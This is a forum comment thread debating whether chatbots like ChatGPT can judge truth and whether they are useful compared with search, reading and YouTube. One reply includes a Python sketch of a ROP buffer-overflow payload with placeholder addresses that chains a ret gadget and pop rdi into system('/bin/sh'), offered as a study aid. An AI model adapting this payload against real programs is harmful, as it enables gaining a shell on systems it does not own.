Comment on People Are Losing Loved Ones to AI-Fueled Spiritual Fantasies
Zozano@aussie.zone 5 days ago
This is the reason I’ve deliberately customized GPT with the following prompts:
- User expects correction if words or phrases are used incorrectly. Tell it straight—no sugar-coating. Stay skeptical and question things. Keep a forward-thinking mindset.
- User values deep, rational argumentation. Ensure reasoning is solid and well-supported.
- User expects brutal honesty. Challenge weak or harmful ideas directly, no holds barred.
- User prefers directness. Point out flaws and errors immediately, without hesitation.
- User appreciates when assumptions are challenged. If something lacks support, dig deeper and challenge it.
dzso@lemmy.world 5 days ago
I’m not saying these prompts won’t help; they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.
Zozano@aussie.zone 4 days ago
What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. ChatGPT is more consistent, less biased, and applies reasoning patterns that outperform the average human by miles.
Epistemology isn’t some mystical art; it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure, it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.
So yes, it can evaluate truth. Not perfectly, but often better than the average person.
dzso@lemmy.world 4 days ago
I’m not saying humans are infallible at recognizing truth either. That’s why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.
Zozano@aussie.zone 4 days ago
Right now, the capabilities of LLMs are the worst they’ll ever be. It could literally be tomorrow that someone drops an LLM that would be perfectly calibrated to evaluate truth claims. But right now, we’re at least 90% of the way there.
The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.
You don’t blame the tool, you blame the user. LLMs are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent and well-read, and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.
I’m curious as to what you regard as a better tool for evaluating truth?
Period.
Olap@lemmy.world 5 days ago
I prefer reading. Wikipedia is great. DuckDuckGo still gives pretty good results with the AI off. YouTube is filled with tutorials too. Pre-AI cookbooks are plentiful. There are also these things called newspapers; they aren’t what they used to be, but you even get a choice of which one to buy.
I’ve no idea what a chatbot could help me with. And I think anybody who does need some help with things could go learn about whatever they need in pretty short order if they wanted. And do a better job.
A_norny_mousse@feddit.org 5 days ago
💯
I have yet to see people using AI for anything actually useful in everyday life. You can search anything, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.
LainTrain@lemmy.dbzer0.com 5 days ago
Okay, challenge accepted.
I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wits’ end. There’s a good chance it will spit out complete nonsense, like calling functions with parameters that don’t exist, etc., but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time, and that I would’ve never guessed myself due to assumptions made in the docs of a library or some such.
It’s also helpful for explaining complex concepts by creating the examples you want. For instance, I was studying basic buffer overflows and wanted to see what I should expect the stack to look like in GDB’s examine-memory view for a correct ROP chain to accomplish what I was trying to do, something no tutorial ever bothered to show. Gippity generated it correctly, same as I had it at the time, and even suggested something that in the end made it actually work (putting a ret gadget directly after the overflow to get rid of any garbage in the stack frame).
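For anyone who hasn’t seen that trick: a lone ret gadget just pops the next stack slot and jumps to it, so placing one right after the overflow lets the chain step past leftover junk (and fixes 16-byte stack alignment, which calls like system() care about on x86-64). A minimal sketch of that payload layout, with entirely made-up addresses and offsets:

```python
# Hypothetical ROP payload sketch; every address and the padding
# offset below are made up purely for illustration.
import struct

def p64(addr: int) -> bytes:
    """Pack an address as a little-endian 64-bit value."""
    return struct.pack("<Q", addr)

OFFSET  = 72        # hypothetical padding up to the saved return address
RET     = 0x40101A  # lone 'ret' gadget: steps past garbage / realigns the stack
POP_RDI = 0x401223  # 'pop rdi; ret' gadget to load the first argument
BIN_SH  = 0x402008  # hypothetical address of a "/bin/sh" string
SYSTEM  = 0x401050  # hypothetical address of system()

payload  = b"A" * OFFSET   # overflow padding
payload += p64(RET)        # the ret gadget placed directly after the overflow
payload += p64(POP_RDI)    # then the actual chain begins
payload += p64(BIN_SH)
payload += p64(SYSTEM)
```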
Deceptichum@quokk.au 5 days ago
Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.
Search engines aren’t great with vague questions.
There’s this thing called using a wide variety of tools to one’s benefit.
Olap@lemmy.world 5 days ago
You search for topics and keywords on search engines. It’s a different skill, and from what I see, it yields better results. If something is vague, think for a moment first and make it less vague. That goes for life!
And a tool which regurgitates rubbish in a verbose manner isn’t a tool, it’s a toy. Toys can spark your curiosity, but you don’t rely on them. Toys look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum.
Deceptichum@quokk.au 5 days ago
Buddy, that’s great if you know the topic or keyword to search for. If you don’t, and you only have a vague query that you’re trying to find out more about, you can use AI to learn some keywords or topics to search for.
You can grandstand about tools and whatever other Luddite shit you want; at the end of the day, despite all your raging, you are the only one who’s going to miss out, whatever you fanatically tell yourself.
Zozano@aussie.zone 5 days ago
I often use it to check whether my rationale is correct, or if my opinions are valid.
Olap@lemmy.world 5 days ago
You do know it can’t reason, and literally makes shit up approximately 50% of the time? It’d be quicker to toss a coin!
Zozano@aussie.zone 5 days ago
Actually, given the aforementioned prompts, it’s quite good at discerning flaws in my arguments and logical contradictions.
LainTrain@lemmy.dbzer0.com 5 days ago
YouTube tutorials are, for the most part, garbage and a waste of your time; they’re created for engagement and milking your money only. The edutainment side of YT à la Vsauce (pls come back) works as general trivia to ensure a well-rounded worldview, but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real, you’re not gonna have much luck learning anything of value in the brainrot that is newspapers and such, beyond cooking or w/e, and who cares about that; I’d rather they teach me how I can never have to eat again, because boy, that shit takes up so much time.
Olap@lemmy.world 5 days ago
For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though; social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.
Don’t use AI. Do your own thinking.